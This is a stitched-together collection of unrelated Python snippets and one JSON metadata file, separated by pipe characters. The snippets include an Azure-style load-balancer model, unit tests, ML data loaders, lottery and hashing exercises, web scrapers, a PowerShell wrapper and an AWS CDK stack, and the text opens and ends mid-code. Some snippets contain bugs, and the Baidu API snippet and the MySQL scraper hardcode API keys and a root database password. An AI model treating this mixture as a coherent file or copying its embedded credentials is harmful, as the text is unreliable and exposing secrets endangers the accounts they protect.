_validation = {
'protocol': {'required': True},
'frontend_port': {'required': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'frontend_ip_configuration': {'key': 'properties.frontendIPConfiguration', 'type': 'SubResource'},
'backend_address_pool': {'key': 'properties.backendAddressPool', 'type': 'SubResource'},
'probe': {'key': 'properties.probe', 'type': 'SubResource'},
'protocol': {'key': 'properties.protocol', 'type': 'str'},
'load_distribution': {'key': 'properties.loadDistribution', 'type': 'str'},
'frontend_port': {'key': 'properties.frontendPort', 'type': 'int'},
'backend_port': {'key': 'properties.backendPort', 'type': 'int'},
'idle_timeout_in_minutes': {'key': 'properties.idleTimeoutInMinutes', 'type': 'int'},
'enable_floating_ip': {'key': 'properties.enableFloatingIP', 'type': 'bool'},
'disable_outbound_snat': {'key': 'properties.disableOutboundSnat', 'type': 'bool'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
}
def __init__(self, *, protocol, frontend_port: int, id: str=None, frontend_ip_configuration=None, backend_address_pool=None, probe=None, load_distribution=None, backend_port: int=None, idle_timeout_in_minutes: int=None, enable_floating_ip: bool=None, disable_outbound_snat: bool=None, provisioning_state: str=None, name: str=None, etag: str=None, **kwargs) -> None:
super(LoadBalancingRule, self).__init__(id=id, **kwargs)
self.frontend_ip_configuration = frontend_ip_configuration
self.backend_address_pool = backend_address_pool
self.probe = probe
self.protocol = protocol
self.load_distribution = load_distribution
self.frontend_port = frontend_port
self.backend_port = backend_port
self.idle_timeout_in_minutes = idle_timeout_in_minutes
self.enable_floating_ip = enable_floating_ip
self.disable_outbound_snat = disable_outbound_snat
self.provisioning_state = provisioning_state
self.name = name
self.etag = etag
|
import unittest
# 4L de jacky
# le compteur kilométrique de la 4L de jacky est tout neuf
# quand le compteur affiche 222222 on retourne True
# quand le compteur affiche 444444 on retourne True
# quand le compteur affiche 738922 on retourne False
# quand le compteur affiche 051968 on retourne True
from Odometer import Odometer, is_interesting
class OdometerTest(unittest.TestCase):
def test_that_all_figures_are_the_same(self):
self.assertEqual(is_interesting(Odometer(222222)), True)
self.assertEqual(is_interesting(Odometer(111111)), True)
self.assertEqual(is_interesting(Odometer(333333)), True)
self.assertEqual(is_interesting(Odometer(555555)), True)
def test_that_all_figures_are_not_interesting_if_do_not_fill_odometer_length(self):
self.assertEqual(is_interesting(Odometer(5555)), False)
def test_that_boring_numbers_arent_interesting(self):
self.assertEqual(is_interesting(Odometer(738922)), False)
self.assertEqual(is_interesting(Odometer(123458)), False)
self.assertEqual(is_interesting(Odometer(628333)), False)
self.assertEqual(is_interesting(Odometer(111112)), False)
def test_that_may_1968_is_interesting(self):
self.assertEqual(is_interesting(Odometer(51968)), True)
def test_that_69_is_in_figures(self):
self.assertEqual(is_interesting(Odometer(12698)), True)
self.assertEqual(is_interesting(Odometer(69)), True)
if __name__ == '__main__':
unittest.main()
|
from bert.preprocess import PAD_INDEX
from sklearn.metrics import f1_score, balanced_accuracy_score
import numpy as np
def mlm_accuracy(predictions, targets):
mlm_predictions, nsp_predictions = predictions
mlm_targets, is_nexts = targets
relevent_indexes = np.where(mlm_targets != PAD_INDEX)
relevent_predictions = mlm_predictions[relevent_indexes]
relevent_targets = mlm_targets[relevent_indexes]
corrects = np.equal(relevent_predictions, relevent_targets)
return corrects.mean()
def nsp_accuracy(predictions, targets):
mlm_predictions, nsp_predictions = predictions
mlm_targets, is_nexts = targets
corrects = np.equal(nsp_predictions, is_nexts)
return corrects.mean()
def classification_accuracy(predictions, targets):
# corrects = np.equal(predictions, targets)
# return corrects.mean()
return balanced_accuracy_score(targets, predictions)
def f1_weighted(predictions, targets):
return f1_score(targets, predictions, average='weighted')
|
# Importing the required libraries
import hashlib, json, sys
"""
def HashFunc(msg=""):
if type(msg) != str:
msg = json.dumps(msg,sort_keys=True)
if sys.version_info.major == 2:
return unicode(hashlib.sha256(msg).hexdigest(),'utf-8')
else:
return hashlib.sha256(str(msg).encode('utf-8')).hexdigest()
"""
# Here We are Creating an Dictionary
# The Dictionary has Key and Value
# Key = 'A' 'B' 'C' and Value 1,2,3
D = {}
D['A'] = 1
D['B'] = 2
D['C'] = 3
# Here we use a for loop to print the contents of Dicitonary
for k in D.keys():
print(D[k])
# Here we print both key value pair
for k,v in D.items():
print(k,v)
# Create Two Arrays for Key and Values
Key_Arr = {'M','O','N','K'}
Val_Arr = {10,20,30,40}
Hash_Var = {k:v for k,v in zip(Key_Arr,Val_Arr)}
Hash_Var
map(hash,Val_Arr)
hash('0')
hash_obj = hashlib.sha256(b'Hello')
hash_obj.hexdigest()
|
from random import randint
from time import sleep
dados = []
megasena = []
print('=='*20)
print('{:^40}'.format('MEGA-SENA'))
print('=='*20)
n = int(input('Quantos jogos você quer que eu sorteie? '))
print(f'-=-=-=-=-= SORTEANDO {n} JOGOS -=-=-=-=-')
for c in range (1, n+1):
for d in range(0, 6):
n2 = (randint(0, 60))
if n2 not in dados:
dados.append(n2)
else:
n2 = (randint(0, 60))
dados.append(n2)
megasena.append(dados)
print(f'Jogo {c}: {dados}')
dados.clear()
sleep(1)
print('=='*20) |
import os
import pickle
import numpy as np
from sklearn.model_selection import train_test_split
"""This script implements the functions for reading data.
"""
def loadpickle(path):
with open(path, 'rb') as file:
data = pickle.load(file,encoding='bytes')
return data
def load_data(data_dir):
"""Load the CIFAR-10 dataset.
Args:
data_dir: A string. The directory where data batches
are stored.
Returns:
x_train: An numpy array of shape [50000, 3072].
(dtype=np.float32)
y_train: An numpy array of shape [50000,].
(dtype=np.int32)
x_test: An numpy array of shape [10000, 3072].
(dtype=np.float32)
y_test: An numpy array of shape [10000,].
(dtype=np.int32)
"""
### YOUR CODE HERE
meta_data = loadpickle(data_dir + '/batches.meta')
train_data = np.empty((0, 3072))
train_labels = []
for i in range(5):
data_load = loadpickle(data_dir + "/data_batch_" + str(i+1))
train_labels = train_labels + data_load[b'labels']
train_data = np.vstack((train_data,data_load[b'data']))
x_train = train_data
y_train = np.array(train_labels)
data_load = loadpickle(data_dir + "/test_batch")
x_test = data_load[b'data']
y_test = np.array(data_load[b'labels'])
### END CODE HERE
return x_train, y_train, x_test, y_test
def load_testing_images(data_dir):
"""Load the images in private testing dataset.
Args:
data_dir: A string. The directory where the testing images
are stored.
Returns:
x_test: An numpy array of shape [N, 32, 32, 3].
(dtype=np.float32)
"""
### YOUR CODE HERE
x_test = []
### END CODE HERE
return x_test
def train_valid_split(x_train, y_train, train_ratio=0.8):
"""Split the original training data into a new training dataset
and a validation dataset.
Args:
x_train: An array of shape [50000, 3072].
y_train: An array of shape [50000,].
train_ratio: A float number between 0 and 1.
Returns:
x_train_new: An array of shape [split_index, 3072].
y_train_new: An array of shape [split_index,].
x_valid: An array of shape [50000-split_index, 3072].
y_valid: An array of shape [50000-split_index,].
"""
### YOUR CODE HERE
x_train_new, x_valid, y_train_new, y_valid = train_test_split(x_train,y_train,train_size=train_ratio)
### END CODE HERE
return x_train_new, y_train_new, x_valid, y_valid
|
#! /usr/bin/env python
# coding = utf-8
import time, pickle, json
d = {'a': 'b'}
c = {'d': 'e'}
p1 = pickle.dumps(d)
p2 = pickle.dumps(c)
j1 = json.dumps(d)
j2 = json.dumps(c)
def write2txt():
with open('time.txt', 'w') as f:
f.write(j1)
f.write('\n')
f.write(j2)
def readftxt():
with open ('time.txt', 'r') as f:
line =f.readlines()
for i in line:
print(json.loads(i))
for line in f.readlines():
line = pickle.loads(line)
print(line)
if __name__ == '__main__':
# write2txt()
readftxt()
|
def readAPIC(filename, artist, album, filetype):
fp = open(filename, 'rb')
if filetype == '.m4a':
covr = b'covr'
elif filetype == '.mp3':
covr = b'ID3'
else:
return False
imagetype = '.png'
start = b'\x89\x50\x4E\x47\x0D\x0A\x1A\x0A' # 默认为png,因为png的文件头长,误匹配到的概率低
end = b'\x00\x00\x00\x00\x49\x45\x4E\x44\xAE\x42\x60\x82'
a = fp.read()
covr_num = a.find(covr)
a = a[covr_num: -1]
start_num = a.find(start)
end_num = a.find(end)
if start_num == -1: # 不为png则为jpg
start = b'\xFF\xD8'
end = b'\xFF\xD9'
start_num = a.find(start)
end_num = a.find(end)
imagetype = '.jpg'
if imagetype == '.jpg':
pic = a[start_num: end_num + 3]
while pic[2: -1].find(start) != -1:
pic = pic[pic[2: -1].find(start) + 2:-1]
elif imagetype == '.png':
pic = a[start_num: end_num + 12]
while pic[8: -1].find(start) != -1:
pic = pic[pic[8: -1].find(start) + 8:-1]
fo = open('images/' + artist + '-' + album + imagetype, 'wb')
fo.write(pic)
fp.close()
fo.close()
return True
|
import subprocess
class PowerShellInterface:
def __init__(self):
pass
def runCommand(self, cmd):
result = subprocess.run(["powershell", "-Command", cmd], capture_output=True)
return result
def printTestCommandOutput(self):
testCommand = "Write-Host Hello World!"
res = self.runCommand(testCommand)
print(str(res.stdout)[2:-3])
def getCurrentClockSpeed(self):
command = '''
$MaxClockSpeed = (Get-CimInstance CIM_Processor).MaxClockSpeed
$ProcessorPerformance = (Get-Counter -Counter "\Processor Information(_Total)\% Processor Performance").CounterSamples.CookedValue
$CurrentClockSpeed = $MaxClockSpeed*($ProcessorPerformance/100)
Write-Host $CurrentClockSpeed, $MaxClockSpeed
'''
res = self.runCommand(command)
return str(res.stdout)[2:-3]
|
import subprocess
import re
from json import JSONEncoder, JSONDecoder
IFACE_STATUS_REGEX = re.compile(r"^[0-9]+:\s([a-zA-Z0-9]+):\s<([A-Za-z,-_]+)>.+state\s((DOWN|UP)).*")
class IFaceError(Exception):
pass
def check_interface_up(interface_name):
check_cmd = ['ip', 'link', 'show', interface_name]
proc = subprocess.Popen(check_cmd, stdout=subprocess.PIPE)
out, err = proc.communicate()
if out == None or proc.returncode != 0:
raise IFaceError('Could not get interface state!')
#use regex
m = IFACE_STATUS_REGEX.match(out)
if m != None:
if m.group(1) == interface_name:
if m.group(3) == "DOWN":
pass
elif m.group(3) == "UP":
return True
#even if down, check the flags
flag_list = m.group(2).split(',')
if "UP" in flag_list:
return True
else:
return False
raise IFaceError('Unknown error while getting interface state')
def set_interface_up(interface_name):
check_cmd = ['ip', 'link', 'set', interface_name, 'up']
proc = subprocess.Popen(check_cmd, stdout=subprocess.PIPE)
out, err = proc.communicate()
if proc.returncode != 0:
#raise only if some output was given
if len(out) > 0:
raise IFaceError('Could not set interface to UP state')
class WifiInfo(object):
"""Store wi-fi information"""
def __init__(self, ap_bss):
self.BSS = ap_bss
self.SSID = None
self.current_signal = None
self.has_key = False
@staticmethod
def from_dict(d):
ret = WifiInfo(None)
ret.__dict__ = d
return ret
def set_ssid(self, ssid):
self.SSID = ssid
def set_signal(self, signal):
self.current_signal = signal
def set_key(self, has_key):
if has_key == True or has_key == False:
self.has_key = has_key
elif has_key == "on":
self.has_key = True
elif has_key == "off":
self.has_key = False
def __repr__(self):
return "[{}] ({}): {} dBm".format(self.BSS, self.SSID, self.current_signal)
class WifiInfoEncoder(JSONEncoder):
def default(self, o):
return o.__dict__
class WifiInfoDecoder(JSONDecoder):
def __init__(self):
super(WifiInfoDecoder, self).__init__(self, object_hook=self.dict_to_object)
def dict_to_object(self, d):
ret = WifiInfo(d['BSS'])
ret.current_signal = d['current_signal']
ret.has_key = d['has_key']
ret.SSID = d['SSID']
return ret
|
# -*- coding: utf-8 -*-
'''
@Author: Wengang.Zheng
@Email: zwg0606@gmail.com
@Filename: 接雨水.py
@Time: 2021-01-17-14:53:55
@Des:
核心思路:i位置的蓄水量由左右两边的最高柱子高度决定
water[i] = min(
# 左边最高的柱子
max(height[0..i]),
# 右边最高的柱子
max(height[i..end])
) - height[i]
'''
def violent_trap(heights):
"""
@brief 接雨水暴力解法: O(n^2),存在重复计算
@details https://leetcode-cn.com/problems/trapping-rain-water/
@param heights: list for height
@return res: num for trapping water(int)
"""
res = 0
for idx in range(len(heights)):
# 找到左边最高的柱子
max_l = heights[idx]
for l_idx in range(idx):
max_l = max(max_l, heights[l_idx])
max_r = heights[idx]
for r_idx in range(idx + 1, len(heights)):
max_r = max(max_r, heights[r_idx])
res += min(max_l, max_r) - heights[idx]
return res
def dp_trap(heights):
"""
@brief 接雨水备忘录解法: 时间复杂度:O(n),空间复杂度可优化
@details https://leetcode-cn.com/problems/trapping-rain-water/
@param heights: list for height
@return res: num for trapping water(int)
"""
from copy import deepcopy
res = 0
table_l = deepcopy(heights)
table_r = deepcopy(heights)
# 计算table_l: O(n)
for idx in range(len(heights)):
l_idx = len(heights) - idx - 1
table_l[l_idx] = max(table_l[l_idx:])
# 计算table_r: O(n)
for idx in range(len(heights)):
r_idx = idx
table_r[r_idx] = max(table_r[:r_idx + 1])
# 根据table计算蓄水量
for idx in range(len(heights)):
res += min(table_l[idx], table_r[idx]) - heights[idx]
return res
def twopoint_trap(heights):
"""
@brief 接雨水双指针解法:时间/空间复杂度:O(n)
@details https://leetcode-cn.com/problems/trapping-rain-water/
@param heights: list for height
@return res: num for trapping water(int)
"""
left = 0
right = len(heights) - 1
l_max = heights[0]
r_max = heights[-1]
res = 0
# 指针从两端向中间聚拢
# 通过判断左右的height值判断雨水量
while (left < right):
# 更新左右高度极值
l_max = max(l_max, heights[left])
r_max = max(r_max, heights[right])
if l_max < r_max:
# 左边高度更小:雨水量由左边最高柱子决定
res += l_max - heights[left]
left += 1
else:
# 右边高度更小:雨水量由右边最高柱子决定
res += r_max - heights[right]
right -= 1
return res
if __name__ == '__main__':
heights = [4, 2, 0, 3, 2, 5]
res1 = violent_trap(heights)
res2 = dp_trap(heights)
res3 = twopoint_trap(heights)
assert res1 == 9 and res2==9 and res3==9
print("All test passed!")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2017/8/16 17:52
# @Author : Geda
import requests
import re
import urllib
import os
import sys
reload(sys)
sys.setdefaultencoding('utf8')
def get_response(url):
response = requests.get(url).text
return response
def get_content(html):
reg = re.compile(r'(<div class="j-r-list-c">.*?</div>.*?</div>)',re.S)
return re.findall(reg,html)
def get_mp4_url(content):
reg = r'data-mp4="(.*?)"'
return re.findall(reg,content)
def get_mp4_name (response):
reg = re.compile(r'<a href="/detail-.{8}.html">(.*?)</a>')
return re.findall(reg,response)
def downmp4(mp4_url,path):
path = ''.join(path.split())
path = 'E:\\xx\\{}.mp4'.format(path.decode('utf-8').encode('gbk'))
if not os.path.exists(path):
urllib.urlretrieve(mp4_url,path)
print 'ok!'
else:
print 'no!'
def get_url_name(start_url):
content = get_content(get_response(start_url))
for i in content:
mp4_url = get_mp4_url(i)
if mp4_url:
mp4_name = get_mp4_name(i)
#print mp4_url[0], mp4_name[0]
downmp4(mp4_url[0],mp4_name[0])
if __name__ == '__main__':
start_url ='http://www.budejie.com/'
get_url_name(start_url)
|
# -*-coding = utf-8-*-
# __author:"NGLS Chuang"
# @time:2019/12/4 15:39
import os
import sys
# 导入路径
from ChooseCourseSystem.core import data
from ChooseCourseSystem.core import education
# BASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# sys.path.append(BASE_PATH)
# print(BASE_PATH)
# 创建学校
def add_school():
print('填写学校信息')
school_name = input('请正确填写学校名(汉字)')
school_address = input('地址:')
school = education.School(school_name, school_address)
data.update_school(school)
# 创建班级
def add_grade():
print('请填写班级信息')
grade_name = input('名称 :')
data.print_schools()
school_name = input('选择学校,输入完整学校名')
school = data.get_school(school_name)
if school == None:
print('您输入的有误')
return
print('选择教师')
data.print_teachers()
teacher_name = input('选择教师')
teacher = data.get_teacher(teacher_name)
if teacher == None:
print('您输入的教师名有误')
return
print("选择课程:")
data.print_courses()
course_name = input("课程名:")
course = data.get_course(course_name)
if course == None:
print("课程选择错误")
return
grade = education.School.create_grade(school, grade_name, course)
education.Grade.sign_in_teacher(grade, teacher)
data.update_grade(grade)
data.update_school(school)
# 创建课程
def add_course():
print('请填写课程信息')
course_name = input('课程名称:')
cycle = input('周期:')
price = input('价格: ')
print('选择学校')
data.print_schools()
school_name = input("学校名:")
school = data.get_school(school_name)
if school == None:
print("学校选择错误")
return
course = education.School.creat_course(school, course_name, cycle, price)
data.update_course(course)
data.update_school(school)
def add_teacher():
print('请填写老师信息')
teacher_name = input('教师姓名:')
print('选择学校')
data.print_schools()
school_name = input('学校名:')
school = data.get_school(school_name)
if school == None:
print('学校选择错误')
return
teacher = education.School.creat_teacher(school, teacher_name)
data.update_teacher(teacher)
data.update_school(school)
print('老师已经创建OK')
def show_schools():
data.print_schools()
def show_courses():
data.print_courses()
def show_teachers():
data.print_teachers()
def show_grades():
data.print_grades()
def show_teacher():
print("选择老师:")
data.print_teachers()
teacher_name = input("老师名:")
teacher = data.get_teacher(teacher_name)
if teacher == None:
print("老师选择错误")
return
teacher.show_info()
def run():
print("学校视图:")
print("=" * 20)
while True:
print("1.增加学校\n2.增加老师\n3.增加课程\n4.增加班级\n"
"5.查看学校\n6.查看老师\n7.查看课程\n8.查看班级\n"
"9.查看教师详细\n"
"0.退出")
res = input("输入序号:")
if res == "1":
add_school()
elif res == "2":
add_teacher()
elif res == "3":
add_course()
elif res == "4":
add_grade()
elif res == "5":
show_schools()
elif res == "6":
show_teachers()
elif res == "7":
show_courses()
elif res == "8":
show_grades()
elif res == "9":
show_teacher()
elif res == "0":
print("退出成功!")
break
else:
print("请选择正确的编号")
if __name__ == "__main__":
run()
|
def printinfo():
print("---" * 10)
print(" python就是简洁")
print("---" * 10)
def add2(a, b):
c = a + b
print(c)
def add2num(a, b):
return a + b
# 返回多个值
def divide(a, b):
shang = a // b
yu = a % b
return shang, yu
printinfo()
add2(11, 21)
result = add2num(11, 22)
print(result)
shang, yu = divide(5, 2)
print(shang, yu) |
from aws_cdk import core as cdk
from aws_cdk import aws_dynamodb as _ddb
import os
class GlobalArgs:
"""
Helper to define global statics
"""
OWNER = "MystiqueAutomation"
ENVIRONMENT = "production"
REPO_NAME = "glue-elastic-views-on-s3"
SOURCE_INFO = f"https://github.com/miztiik/{REPO_NAME}"
VERSION = "2021_03_07"
MIZTIIK_SUPPORT_EMAIL = ["mystique@example.com", ]
class DynamoDBStack(cdk.Stack):
def __init__(
self,
scope: cdk.Construct,
construct_id: str,
stack_log_level: str,
**kwargs
) -> None:
super().__init__(scope, construct_id, **kwargs)
id_prefix_str = f"elasticViews"
ddb_table_name = "elasticViewsMoviesTable_2021"
# create dynamo table
movies_table = _ddb.Table(
self,
f"{id_prefix_str}SrcDdb",
partition_key=_ddb.Attribute(
name="year",
type=_ddb.AttributeType.NUMBER
),
sort_key=_ddb.Attribute(
name="title",
type=_ddb.AttributeType.STRING
),
read_capacity=50,
write_capacity=50,
table_name=f"{ddb_table_name}",
removal_policy=cdk.RemovalPolicy.DESTROY
)
###########################################
################# OUTPUTS #################
###########################################
output_0 = cdk.CfnOutput(
self,
"AutomationFrom",
value=f"{GlobalArgs.SOURCE_INFO}",
description="To know more about this automation stack, check out our github page."
)
output_1 = cdk.CfnOutput(
self,
"srcMoviesDdbTable",
value=f"https://console.aws.amazon.com/events/home?region={cdk.Aws.REGION}#/eventbus/{movies_table.table_name}",
description="Source Dynamodb table for Glue Elastic Views"
)
|
# -*- coding: utf-8 -*-
import urllib2
from urllib import urlencode
url = 'http://apis.baidu.com/turing/turing/turing'
req = urllib2.Request(url)
req.add_header('apikey', '1b7f52ccc223f79eb67ab1cc25af0ab7')
urlParam = {
'key': '879a6cb3afb84dbf4fc84a1df2ab7319',
'info': '你好',
'userid': '张三'
}
urlParam = urlencode(urlParam)
resp = urllib2.urlopen(req, urlParam)
content = resp.read()
print (content)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
print("hi")
process.stdout.readline()
sys.stdout.flush()
sys.stdout.write("\n")
sys.stdout.write("running bigQuery ETL...")
import ETLbiqQueryData
ETLbiqQueryData.main()
sys.stdout.flush()
sys.stdout.write("Done!")
sys.stdout.write("\n")
sys.stdout.write("cleaning media plan...")
import cleanMediaPlan
cleanMediaPlan.main()
sys.stdout.flush()
sys.stdout.write("Done!")
sys.stdout.write("\n")
sys.stdout.write("running main process...")
import mainProcess
mainProcess.main()
sys.stdout.flush()
sys.stdout.write("Done!")
sys.stdout.write("\n")
sys.stdout.write("merging results...")
import letsGetMarried
letsGetMarried.main()
sys.stdout.flush()
sys.stdout.write("Done!")
def main():
""" Main program """
# Code goes over here.
return 0
if __name__ == "__main__":
main() |
{
"id": "mgm4456372.3",
"metadata": {
"mgm4456372.3.metadata.json": {
"format": "json",
"provider": "metagenomics.anl.gov"
}
},
"providers": {
"metagenomics.anl.gov": {
"files": {
"100.preprocess.info": {
"compression": null,
"description": null,
"size": 736,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/100.preprocess.info"
},
"100.preprocess.passed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 56284,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/100.preprocess.passed.fna.gz"
},
"100.preprocess.passed.fna.stats": {
"compression": null,
"description": null,
"size": 309,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/100.preprocess.passed.fna.stats"
},
"100.preprocess.removed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 896,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/100.preprocess.removed.fna.gz"
},
"100.preprocess.removed.fna.stats": {
"compression": null,
"description": null,
"size": 305,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/100.preprocess.removed.fna.stats"
},
"205.screen.h_sapiens_asm.info": {
"compression": null,
"description": null,
"size": 448,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/205.screen.h_sapiens_asm.info"
},
"299.screen.info": {
"compression": null,
"description": null,
"size": 410,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/299.screen.info"
},
"299.screen.passed.fna.gcs": {
"compression": null,
"description": null,
"size": 1171,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/299.screen.passed.fna.gcs"
},
"299.screen.passed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 53310,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/299.screen.passed.fna.gz"
},
"299.screen.passed.fna.lens": {
"compression": null,
"description": null,
"size": 335,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/299.screen.passed.fna.lens"
},
"299.screen.passed.fna.stats": {
"compression": null,
"description": null,
"size": 309,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/299.screen.passed.fna.stats"
},
"440.cluster.rna97.fna.gz": {
"compression": "gzip",
"description": null,
"size": 12434,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/440.cluster.rna97.fna.gz"
},
"440.cluster.rna97.fna.stats": {
"compression": null,
"description": null,
"size": 306,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/440.cluster.rna97.fna.stats"
},
"440.cluster.rna97.info": {
"compression": null,
"description": null,
"size": 947,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/440.cluster.rna97.info"
},
"440.cluster.rna97.mapping": {
"compression": null,
"description": null,
"size": 57457,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/440.cluster.rna97.mapping"
},
"440.cluster.rna97.mapping.stats": {
"compression": null,
"description": null,
"size": 48,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/440.cluster.rna97.mapping.stats"
},
"450.rna.expand.lca.gz": {
"compression": "gzip",
"description": null,
"size": 79198,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/450.rna.expand.lca.gz"
},
"450.rna.expand.rna.gz": {
"compression": "gzip",
"description": null,
"size": 20811,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/450.rna.expand.rna.gz"
},
"450.rna.sims.filter.gz": {
"compression": "gzip",
"description": null,
"size": 14683,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/450.rna.sims.filter.gz"
},
"450.rna.sims.gz": {
"compression": "gzip",
"description": null,
"size": 149201,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/450.rna.sims.gz"
},
"900.abundance.function.gz": {
"compression": "gzip",
"description": null,
"size": 8003,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/900.abundance.function.gz"
},
"900.abundance.lca.gz": {
"compression": "gzip",
"description": null,
"size": 7710,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/900.abundance.lca.gz"
},
"900.abundance.md5.gz": {
"compression": "gzip",
"description": null,
"size": 11983,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/900.abundance.md5.gz"
},
"900.abundance.ontology.gz": {
"compression": "gzip",
"description": null,
"size": 43,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/900.abundance.ontology.gz"
},
"900.abundance.organism.gz": {
"compression": "gzip",
"description": null,
"size": 17532,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/900.abundance.organism.gz"
},
"900.loadDB.sims.filter.seq": {
"compression": null,
"description": null,
"size": 1360496,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/900.loadDB.sims.filter.seq"
},
"900.loadDB.source.stats": {
"compression": null,
"description": null,
"size": 118,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/900.loadDB.source.stats"
},
"999.done.COG.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/999.done.COG.stats"
},
"999.done.KO.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/999.done.KO.stats"
},
"999.done.NOG.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/999.done.NOG.stats"
},
"999.done.Subsystems.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/999.done.Subsystems.stats"
},
"999.done.class.stats": {
"compression": null,
"description": null,
"size": 543,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/999.done.class.stats"
},
"999.done.domain.stats": {
"compression": null,
"description": null,
"size": 36,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/999.done.domain.stats"
},
"999.done.family.stats": {
"compression": null,
"description": null,
"size": 1701,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/999.done.family.stats"
},
"999.done.genus.stats": {
"compression": null,
"description": null,
"size": 2125,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/999.done.genus.stats"
},
"999.done.order.stats": {
"compression": null,
"description": null,
"size": 811,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/999.done.order.stats"
},
"999.done.phylum.stats": {
"compression": null,
"description": null,
"size": 289,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/999.done.phylum.stats"
},
"999.done.rarefaction.stats": {
"compression": null,
"description": null,
"size": 27201,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/999.done.rarefaction.stats"
},
"999.done.sims.stats": {
"compression": null,
"description": null,
"size": 79,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/999.done.sims.stats"
},
"999.done.species.stats": {
"compression": null,
"description": null,
"size": 5826,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/999.done.species.stats"
}
},
"id": "mgm4456372.3",
"provider": "metagenomics.anl.gov",
"providerId": "mgm4456372.3"
}
},
"raw": {
"mgm4456372.3.fna.gz": {
"compression": "gzip",
"format": "fasta",
"provider": "metagenomics.anl.gov",
"url": "http://api.metagenomics.anl.gov/reads/mgm4456372.3"
}
}
} |
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from fake_useragent import UserAgent
import MySQLdb
from multiprocessing.dummy import Pool as ThreadPool
# from multiprocessing import Pool
import time
# sql='create table jobbole(title char(100),text_type char(20),time char(16),content text);'
def get_single_page_info(url):
conn=MySQLdb.connect(host='localhost',user='root',passwd='rootroot',db='mydb',charset='utf8')
cursor=conn.cursor()
start=time.time()
# ua=UserAgent()
# print ua.random
dcap=dict(DesiredCapabilities.PHANTOMJS)
dcap['phantomjs.page.settings.userAgent']='Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'
# dcap['phantomjs.page.settings.userAgent']=ua.random
driver=webdriver.PhantomJS(desired_capabilities=dcap)
# driver=webdriver.PhantomJS()
driver.get(url)
titles=driver.find_elements_by_class_name('archive-title')
